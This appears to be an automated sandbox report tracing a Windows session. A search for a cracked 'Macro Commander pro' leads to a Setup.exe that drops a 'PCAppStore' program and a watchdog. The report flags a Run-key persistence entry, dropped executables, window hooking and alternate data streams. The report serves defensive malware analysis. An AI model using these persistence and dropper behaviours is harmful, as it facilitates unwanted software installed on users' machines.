PID 4932 wrote to memory of 1688	4932	chrome.exe	84
PID 4932 wrote to memory of 1688	4932	chrome.exe	84
PID 4932 wrote to memory of 4808	4932	chrome.exe	85
PID 4932 wrote to memory of 4808	4932	chrome.exe	85
PID 4932 wrote to memory of 4808	4932	chrome.exe	85
PID 4932 wrote to memory of 4808	4932	chrome.exe	85
PID 4932 wrote to memory of 4808	4932	chrome.exe	85
PID 4932 wrote to memory of 4808	4932	chrome.exe	85
PID 4932 wrote to memory of 4808	4932	chrome.exe	85
PID 4932 wrote to memory of 4808	4932	chrome.exe	85
PID 4932 wrote to memory of 4808	4932	chrome.exe	85
PID 4932 wrote to memory of 4808	4932	chrome.exe	85
PID 4932 wrote to memory of 4808	4932	chrome.exe	85
PID 4932 wrote to memory of 4808	4932	chrome.exe	85
PID 4932 wrote to memory of 4808	4932	chrome.exe	85
PID 4932 wrote to memory of 4808	4932	chrome.exe	85
PID 4932 wrote to memory of 4808	4932	chrome.exe	85
PID 4932 wrote to memory of 4808	4932	chrome.exe	85
PID 4932 wrote to memory of 4808	4932	chrome.exe	85
PID 4932 wrote to memory of 4808	4932	chrome.exe	85
PID 4932 wrote to memory of 4808	4932	chrome.exe	85
PID 4932 wrote to memory of 4808	4932	chrome.exe	85
PID 4932 wrote to memory of 4808	4932	chrome.exe	85
PID 4932 wrote to memory of 4808	4932	chrome.exe	85
PID 4932 wrote to memory of 4808	4932	chrome.exe	85
PID 4932 wrote to memory of 4808	4932	chrome.exe	85
PID 4932 wrote to memory of 4808	4932	chrome.exe	85
PID 4932 wrote to memory of 4808	4932	chrome.exe	85
PID 4932 wrote to memory of 4808	4932	chrome.exe	85
PID 4932 wrote to memory of 4808	4932	chrome.exe	85
PID 4932 wrote to memory of 4808	4932	chrome.exe	85
PID 4932 wrote to memory of 4808	4932	chrome.exe	85
PID 4932 wrote to memory of 2280	4932	chrome.exe	86
PID 4932 wrote to memory of 2280	4932	chrome.exe	86
PID 4932 wrote to memory of 2744	4932	chrome.exe	87
PID 4932 wrote to memory of 2744	4932	chrome.exe	87
PID 4932 wrote to memory of 2744	4932	chrome.exe	87
PID 4932 wrote to memory of 2744	4932	chrome.exe	87
PID 4932 wrote to memory of 2744	4932	chrome.exe	87
PID 4932 wrote to memory of 2744	4932	chrome.exe	87
PID 4932 wrote to memory of 2744	4932	chrome.exe	87
PID 4932 wrote to memory of 2744	4932	chrome.exe	87
PID 4932 wrote to memory of 2744	4932	chrome.exe	87
PID 4932 wrote to memory of 2744	4932	chrome.exe	87
PID 4932 wrote to memory of 2744	4932	chrome.exe	87
PID 4932 wrote to memory of 2744	4932	chrome.exe	87
PID 4932 wrote to memory of 2744	4932	chrome.exe	87
PID 4932 wrote to memory of 2744	4932	chrome.exe	87
PID 4932 wrote to memory of 2744	4932	chrome.exe	87
PID 4932 wrote to memory of 2744	4932	chrome.exe	87
PID 4932 wrote to memory of 2744	4932	chrome.exe	87
PID 4932 wrote to memory of 2744	4932	chrome.exe	87
PID 4932 wrote to memory of 2744	4932	chrome.exe	87
PID 4932 wrote to memory of 2744	4932	chrome.exe	87
PID 4932 wrote to memory of 2744	4932	chrome.exe	87
PID 4932 wrote to memory of 2744	4932	chrome.exe	87
PID 4932 wrote to memory of 2744	4932	chrome.exe	87
PID 4932 wrote to memory of 2744	4932	chrome.exe	87
PID 4932 wrote to memory of 2744	4932	chrome.exe	87
PID 4932 wrote to memory of 2744	4932	chrome.exe	87
PID 4932 wrote to memory of 2744	4932	chrome.exe	87
PID 4932 wrote to memory of 2744	4932	chrome.exe	87
PID 4932 wrote to memory of 2744	4932	chrome.exe	87
PID 4932 wrote to memory of 2744	4932	chrome.exe	87

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://www.google.com/search?q=Macro+Commander+pro+crack&rlz=1C1VDKB_enUS1093US1093&oq=Macro+Commander+pro+crack&gs_lcrp=EgZjaHJvbWUyBggAEEUYOTIKCAEQABiABBiiBDIKCAIQABiABBiiBDIKCAMQABiABBiiBNIBCDI4NjNqMGo3qAIAsAIA&sourceid=chrome&ie=UTF-8
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4932
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.106 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffa8429cc40,0x7ffa8429cc4c,0x7ffa8429cc58
  2⤵
  PID:1688
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1856,i,3835553938175449059,12128896603763178390,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=1600 /prefetch:2
  2⤵
  PID:4808
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2068,i,3835553938175449059,12128896603763178390,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=2184 /prefetch:3
  2⤵
  PID:2280
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2208,i,3835553938175449059,12128896603763178390,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=2240 /prefetch:8
  2⤵
  PID:2744
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3100,i,3835553938175449059,12128896603763178390,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=3144 /prefetch:1
  2⤵
  PID:1388
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3108,i,3835553938175449059,12128896603763178390,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=3164 /prefetch:1
  2⤵
  PID:1400
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4836,i,3835553938175449059,12128896603763178390,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=4844 /prefetch:8
  2⤵
  PID:3332
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=208,i,3835553938175449059,12128896603763178390,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=728 /prefetch:1
  2⤵
  PID:2476
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=5104,i,3835553938175449059,12128896603763178390,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=4996 /prefetch:1
  2⤵
  PID:3520
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=5136,i,3835553938175449059,12128896603763178390,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=5068 /prefetch:1
  2⤵
  PID:4768
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --field-trial-handle=5328,i,3835553938175449059,12128896603763178390,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=5424 /prefetch:1
  2⤵
  PID:4608
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=5536,i,3835553938175449059,12128896603763178390,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=5588 /prefetch:8
  2⤵
  PID:3572
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5548,i,3835553938175449059,12128896603763178390,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=5564 /prefetch:8
  2⤵
  - Modifies registry class
  PID:3060
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5904,i,3835553938175449059,12128896603763178390,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=5508 /prefetch:8
  2⤵
  PID:3480
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=6060,i,3835553938175449059,12128896603763178390,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=5952 /prefetch:8
  2⤵
  PID:4224
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5824,i,3835553938175449059,12128896603763178390,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=6356 /prefetch:8
  2⤵
  PID:4784
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=6268,i,3835553938175449059,12128896603763178390,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=5924 /prefetch:8
  2⤵
  PID:4860
- C:\Users\Admin\Downloads\Setup.exe
  "C:\Users\Admin\Downloads\Setup.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious behavior: EnumeratesProcesses
  PID:4196
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" https://pcapp.store/installing.php?guid=1D0C136D-D77C-4455-9382-3336E2DF950BX&winver=19041&version=fa.1091q&nocache=20240720013626.240&_fcid=1721439372838408
    3⤵
    PID:3428
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.106 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffa8429cc40,0x7ffa8429cc4c,0x7ffa8429cc58
      4⤵
      PID:2296
- - C:\Users\Admin\AppData\Local\Temp\nsk3522.tmp
    "C:\Users\Admin\AppData\Local\Temp\nsk3522.tmp" /internal 1721439372838408 /force
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Adds Run key to start application
    - Suspicious behavior: EnumeratesProcesses
    PID:1408
  - - C:\Users\Admin\PCAppStore\PcAppStore.exe
      "C:\Users\Admin\PCAppStore\PcAppStore.exe" /init default
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Enumerates connected drives
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: GetForegroundWindowSpam
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      Suspicious use of SetWindowsHookEx
      PID:3288
    - - C:\Users\Admin\PCAppStore\nwjs\NW_store.exe
        
        .\nwjs\NW_store.exe .\ui\.
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Loads dropped DLL
        Checks system information in the registry
        Enumerates system info in registry
        Modifies data under HKEY_USERS
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        
        PID:2692
      - C:\Users\Admin\PCAppStore\nwjs\NW_store.exe
        
        C:\Users\Admin\PCAppStore\nwjs\NW_store.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\pc_app_store\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\pc_app_store\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\pc_app_store\User Data" --annotation=plat=Win64 --annotation=prod=pc_app_store --annotation=ver=0.1.0 --initial-client-data=0x2ac,0x2b0,0x2b4,0x2a8,0x2b8,0x7ffa8c78a960,0x7ffa8c78a970,0x7ffa8c78a980
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        
        PID:3204
      - C:\Users\Admin\PCAppStore\nwjs\NW_store.exe
        
        "C:\Users\Admin\PCAppStore\nwjs\NW_store.exe" --type=gpu-process --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\pc_app_store\User Data" --nwapp-path=".\ui\." --no-appcompat-clear --start-stack-profiler --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=2256 --field-trial-handle=2260,i,15785922765844422499,15320240959223429335,262144 --variations-seed-version /prefetch:2
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:5172
      - C:\Users\Admin\PCAppStore\nwjs\NW_store.exe
        
        "C:\Users\Admin\PCAppStore\nwjs\NW_store.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\pc_app_store\User Data" --nwapp-path=".\ui\." --no-appcompat-clear --start-stack-profiler --mojo-platform-channel-handle=2264 --field-trial-handle=2260,i,15785922765844422499,15320240959223429335,262144 --variations-seed-version /prefetch:3
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:5180
      - C:\Users\Admin\PCAppStore\nwjs\NW_store.exe
        
        "C:\Users\Admin\PCAppStore\nwjs\NW_store.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\pc_app_store\User Data" --nwapp-path=".\ui\." --no-appcompat-clear --mojo-platform-channel-handle=2280 --field-trial-handle=2260,i,15785922765844422499,15320240959223429335,262144 --variations-seed-version /prefetch:8
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Loads dropped DLL
        
        PID:5188
      - C:\Users\Admin\PCAppStore\nwjs\NW_store.exe
        
        "C:\Users\Admin\PCAppStore\nwjs\NW_store.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\pc_app_store\User Data" --nwapp-path=".\ui\." --nwjs --extension-process --no-appcompat-clear --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\PCAppStore\nwjs\gen" --no-zygote --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2820 --field-trial-handle=2260,i,15785922765844422499,15320240959223429335,262144 --variations-seed-version /prefetch:2
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Loads dropped DLL
        NTFS ADS
        
        PID:5688
      - C:\Users\Admin\PCAppStore\nwjs\NW_store.exe
        
        "C:\Users\Admin\PCAppStore\nwjs\NW_store.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\pc_app_store\User Data" --nwapp-path=".\ui\." --no-appcompat-clear --mojo-platform-channel-handle=4556 --field-trial-handle=2260,i,15785922765844422499,15320240959223429335,262144 --variations-seed-version /prefetch:8
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:5924
      - C:\Users\Admin\PCAppStore\nwjs\NW_store.exe
        
        "C:\Users\Admin\PCAppStore\nwjs\NW_store.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\pc_app_store\User Data" --nwapp-path=".\ui\." --no-appcompat-clear --mojo-platform-channel-handle=5048 --field-trial-handle=2260,i,15785922765844422499,15320240959223429335,262144 --variations-seed-version /prefetch:8
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:5960
      - C:\Users\Admin\PCAppStore\nwjs\NW_store.exe
        
        "C:\Users\Admin\PCAppStore\nwjs\NW_store.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\pc_app_store\User Data" --nwapp-path=".\ui\." --no-appcompat-clear --mojo-platform-channel-handle=4628 --field-trial-handle=2260,i,15785922765844422499,15320240959223429335,262144 --variations-seed-version /prefetch:8
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:5040
      - C:\Users\Admin\PCAppStore\nwjs\NW_store.exe
        
        "C:\Users\Admin\PCAppStore\nwjs\NW_store.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\pc_app_store\User Data" --nwapp-path=".\ui\." --no-appcompat-clear --mojo-platform-channel-handle=4896 --field-trial-handle=2260,i,15785922765844422499,15320240959223429335,262144 --variations-seed-version /prefetch:8
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:5108
      - C:\Users\Admin\PCAppStore\nwjs\NW_store.exe
        
        "C:\Users\Admin\PCAppStore\nwjs\NW_store.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\pc_app_store\User Data" --nwapp-path=".\ui\." --no-appcompat-clear --start-stack-profiler --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAABEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=600 --field-trial-handle=2260,i,15785922765844422499,15320240959223429335,262144 --variations-seed-version /prefetch:8
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        
        PID:4280
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.mobi-gamez.com/play/watermelon_merge?c=6283282216&p_key=FATNAT01
        5⤵
        
        PID:6736
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.106 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffa8429cc40,0x7ffa8429cc4c,0x7ffa8429cc58
        6⤵
        
        PID:6732
    - - C:\Users\Admin\PCAppStore\PcAppStore.exe
        
        "C:\Users\Admin\PCAppStore\PcAppStore.exe" /init default /restart
        5⤵
        
        PID:5944
  - - C:\Users\Admin\PCAppStore\Watchdog.exe
      "C:\Users\Admin\PCAppStore\Watchdog.exe" /guid=1D0C136D-D77C-4455-9382-3336E2DF950BX /rid=20240720013647.848240748640 /ver=fa.1091q
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      PID:3340
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --field-trial-handle=5756,i,3835553938175449059,12128896603763178390,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=6056 /prefetch:1
  2⤵
  PID:1740
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=6620,i,3835553938175449059,12128896603763178390,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=6608 /prefetch:8
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  PID:4992
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --field-trial-handle=6216,i,3835553938175449059,12128896603763178390,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=4388 /prefetch:1
  2⤵
  PID:6800
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --field-trial-handle=6360,i,3835553938175449059,12128896603763178390,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=3276 /prefetch:1
  2⤵
  PID:6232
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --field-trial-handle=6804,i,3835553938175449059,12128896603763178390,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=5952 /prefetch:1
  2⤵
  PID:6488
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --field-trial-handle=952,i,3835553938175449059,12128896603763178390,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=3184 /prefetch:1
  2⤵
  PID:6600
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --field-trial-handle=3168,i,3835553938175449059,12128896603763178390,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=3236 /prefetch:1
  2⤵
  PID:5828
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --field-trial-handle=6832,i,3835553938175449059,12128896603763178390,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=3240 /prefetch:1
  2⤵
  PID:2136
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --field-trial-handle=6844,i,3835553938175449059,12128896603763178390,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=6768 /prefetch:1
  2⤵
  PID:7048
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --field-trial-handle=7104,i,3835553938175449059,12128896603763178390,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=7124 /prefetch:1
  2⤵
  PID:7060
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --field-trial-handle=6772,i,3835553938175449059,12128896603763178390,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=6828 /prefetch:1
  2⤵
  PID:6320
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --field-trial-handle=6368,i,3835553938175449059,12128896603763178390,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=3160 /prefetch:1
  2⤵
  PID:4740
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --field-trial-handle=7152,i,3835553938175449059,12128896603763178390,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=7160 /prefetch:1
  2⤵
  PID:6464
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --field-trial-handle=6184,i,3835553938175449059,12128896603763178390,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=6592 /prefetch:1
  2⤵
  PID:4900
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --field-trial-handle=5500,i,3835553938175449059,12128896603763178390,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=4428 /prefetch:1
  2⤵
  PID:5328
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5928,i,3835553938175449059,12128896603763178390,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=6000 /prefetch:8
  2⤵
  PID:2588
- C:\Program Files\Google\Chrome\Application\chrome.exe
